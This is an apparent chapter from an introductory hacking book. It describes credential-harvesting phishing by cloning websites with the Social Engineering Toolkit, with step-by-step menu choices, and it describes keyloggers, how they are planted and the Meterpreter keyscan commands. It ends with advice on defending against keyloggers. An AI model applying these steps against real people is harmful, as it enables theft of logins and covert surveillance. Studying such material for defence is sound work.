Chapter 3) Text Manipulation

Phishing is a popular web attack used by both scammers and hackers. By pretending to be an authentic and trusted authority, it manipulates the victim into giving out personal information. The hacker can achieve this by pretending to be a representative of an IT company or bank, an employee of an online payment system or even a friend from a social media website. Phishing is a social engineering attack technique. It attempts to pull a user to a website that is often a clone of an original website with which the user is familiar or that the user visits frequently.

Phishing is usually achieved by cloning a legitimate website in the hopes of getting the user's login details. The website is cloned to look exactly like the original website; a piece of code is written that collects the username and password used on the website. That information is then saved in a remote location, usually in text format. Next, this cloned website uses the user’s login credentials to create a login attempt on the original site so the user will be logged into the original website. This is a very important step in the phishing procedure, as it is essential that the victim does not suspect foul play during his or her attempt at logging into the website.

The user is also cajoled into visiting the cloned website through the use of a phishing email that prompts the user into clicking a link that redirects the user to the cloned website. The Social Engineering Toolkit in Kali Linux is an important tool in achieving this feat. The social engineering tool contains options for cloning a website exactly as it is on the original website. It also contains a tool for sending the mass email to several target email addresses or to a single target email address.

To execute a phishing attack effectively, you must log into your Kali Linux distro, click the application icon, go to BackTrack and choose the Exploitation Tools option on the right. This will display another set of options containing tools like Web Exploitation tools and Physical Exploitation tools. Our focus will be on clicking the Social Engineering tools. We choose the Social Engineering Toolkit. The Social Engineering Toolkit will open the terminal and show a menu containing different social engineering attack tools. We choose the Web Attack Vector option, then choose the credential harvester attack method on option 3. This option would allow us to clone a website. 

The credential harvester option opens up a menu containing three options: (1) the web template option which allows the social engineering tool to import a set of pre-defined web applications we can use in the attack; (2) the site cloner, which helps us clone any site of our choosing; and (3) importing our own customized HTML template. Option two would make the Social Engineering Toolkit ask for the IP address on which to listen and for the website to be cloned. Once these two parameters are provided, the toolkit starts cloning the website. When an unsuspecting victim visits this website, the SET collects the username and password. The website clone is typically used with the spear-phishing option, in which the link to the cloned website is sent in a mass email attack to several targets or to just one target.

Keyloggers are scripts or devices that allow the hacker to track each keyboard or keypad stroke of the victim and save it in a text or readable format. It is a very useful tool for information gathering. Often, keyloggers are programs or scripts that run in the background on the computer on which they are installed, although physical keyloggers exist as USB multiports or as P2S ports to which the keyboard is connected before being connected to the CPU. This type of physical keylogger contains a memory chip that can be removed and checked for all the information and keyboard strokes it has stored. There are also wireless keyloggers that can sniff, intercept and hijack data sent from a keyboard to its receiver. In addition, there is keylogger software that is installed on the target computer. This type of keylogger software runs in the background without interfering with the victim's activity on his or her personal computer.

Software-based keyloggers must be installed on the victim's computer. This can be done in various ways, which we will discuss shortly. A hacker may be aware of a flaw present in an app the client uses and then exploit this vulnerability to trick the victim into visiting a website that downloads and executes the keylogger. The hacker may send the victim links to download an app or file containing the keylogger. When the victim installs this application, it runs the keylogger installation in the background and starts the keylogger program. A hacker may, on the other hand, place the keylogger in a USB drive with an autorun file. When an individual pick up this drive and inserts it into his/her computer, curious about what is on the drive, the keylogger is automatically executed in the background and starts tracking the user’s keystrokes.

Most of these types of keyloggers work remotely and need an internet connection to send the key logs to the hacker. Other types of keyloggers save the keystrokes locally on the victim's computer and require the hacker to have physical access to the computer to retrieve the log files. Keyloggers are also capable of doing more than tracking keystrokes. They can take screenshots and save information copied on the screen and copied to the clipboard.

Keyloggers are powerful programs. They are easy to build, and most are executed as part of a rootkit. Spyware like keyloggers are very powerful and require minimal coding and resources to run on the operating system. They can fly under the radar and be undetectable by the system’s antivirus application. They typically consist of a dynamic link library and an installer which installs these files and enables them to run in the background. The keylogger can be created using the Metaspoilt option in Kali Linux with the meterpreter. The keyscan_start command is used to start up the keylogger, while the keyscan_dump command requests and receives the log files of the keyboard strokes.

Protection against keyloggers is recommended for any PC user. A good way to do this is by installing antispyware on the computer system. Keyloggers can be very sneaky and can avoid detection by the antivirus software on a PC. The spyware tool would search and pick out keyloggers running in the background. Some antispyware also encrypts the keystroke of the keyboard, causing the keylogger to send a jumbled-up logfile to the remote hacker. This encryption technique is also useful against hardware keyloggers. Although there is no one-size-fits-all approach to protection against keyloggers, it is advisable to regularly scan the system, check background processes for odd processes running in the background and avoid downloading and installing suspicious applications.